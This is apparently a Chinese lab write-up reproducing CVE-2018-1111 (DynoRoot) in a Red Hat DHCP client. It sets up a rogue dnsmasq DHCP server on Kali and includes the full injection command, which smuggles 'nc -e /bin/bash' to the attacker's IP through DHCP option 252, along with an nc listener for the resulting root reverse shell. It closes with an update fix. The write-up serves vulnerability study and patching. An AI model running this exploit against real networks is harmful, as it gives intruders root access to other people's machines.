CVE-2018-1111复现

漏洞原理

DynoRoot:Red Hat DHCP客户端命令执行漏洞(CVE-2018-1111)预警

复现环境

  • Parallels Desktop
  • kali(攻击机)
  • centos 7(目标主机)

注意:

  1. 关闭Parallels Desktoppd host-only模式下的dhcp
  2. 开启两台虚拟机,网络模式选择host-only

攻击机配置

kali上配置ip信息:

1
2
ifconfig eth0 192.168.2.222 netmask 255.255.255.0
route add default gw 192.168.2.222

kali上使用nc监听520端口(今天520^^)

1
nc -l -p 520 -v

创建一个dnsmasq.conf文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
bind-interfaces

interface=eth0

except-interface=lo

dhcp-range=192.168.2.10,192.168.2.30,22h

dhcp-option=3,192.168.2.222

dhcp-option=6,192.168.2.222

log-queries

log-facility=/var/log/dnsmasq.log

攻击

kali机器上运行dnsmasq来伪造dhcp服务器,发起攻击包,这里用nc反弹shell

1
dnsmasq -dC dnsmasq.conf --dhcp-option="252,'&nc -e /bin/bash 192.168.2.222 520 #"

dnsmasq运行效果:

image

此时centos机器获取到了kali机器分配的ip地址:

image

kali端收到了反弹的shell,root权限:

image

修复方式

idc机器一般都是固定ip,不会使用dhcp,但有些云主机会使用到dhclient,需要升级处理。

1
yum update dhclient